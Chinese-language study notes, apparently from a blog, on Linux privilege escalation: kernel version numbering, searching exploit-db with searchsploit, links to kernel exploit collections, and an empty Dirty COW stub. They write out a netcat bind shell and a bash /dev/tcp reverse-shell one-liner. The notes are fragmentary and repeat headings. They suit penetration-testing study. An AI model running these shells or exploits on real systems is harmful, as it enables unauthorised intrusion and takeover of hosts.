- Linux系统内核漏洞提权:(常见的就是系统内核提权 | 脏牛提权 | suid提权)
- 原理:
- linux内核版本的分类
Linux内核版本有两种:稳定版和开发版 ,Linux内核版本号由3组数字组成:第一个组数字.第二组数字.第三组数字
第一个组数字:目前发布的内核主版本。
第二个组数字:偶数表示稳定版本;奇数表示开发中版本。
第三个组数字:错误修补的次数。
- linux内核版本的分类
- 思路(利用linux系统漏洞进行提权,首先搜索linux系统漏洞,然后去github搜索Debian 5对应的exp进行提权):
- uname -a 查看内核版本
- searchsploit linux Debian 5 使用可以用kali自带的searchsploit来搜索exploitdb中的漏洞利用代码
`
- local代表本地提权,remote代表远程攻击
- linux常用exp地址:
- https://github.com/SecWiki/linux-kernel-exploits
https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/
https://github.com/xairy/kernel-exploits
- 反弹shell提权:
- 方式1:
- 如果手里只有webshell可以利用反弹shell来得到一个shell
首先我们得有一个netcat
开启本地监听
1. # 开启本地8080端口监听,并将本地的bash发布出去。
2. nc -lvvp 8080 -t -e /bin/bash
直接连接目标主机
nc 192.168.1.1 8000
- 如果手里只有webshell可以利用反弹shell来得到一个shell
- 方式2:
- bash直接反弹
- bash一句话shell反弹:个人感觉最好用的用的方法就是使用的方法就是使用bash结合重定向方法的一句话,具体命令如下。
(1) bash反弹一句话 | 192.168.15.99 这个是受害机IP,不是攻击机
1. bash -i >& /dev/tcp/192.168.15.99/8000 0>&1
2. 本地 nc -l -p 8000
- 方式1:
- 脏牛提权:
- 问题:
- kali新建用户123为普通用户普通权限,提权为管理员权限
- 原理:
- POC:https://github.com/FireFar
- 问题:
- 原理:
Linux与数据库提权
最新推荐文章于 2024-06-13 19:35:06 发布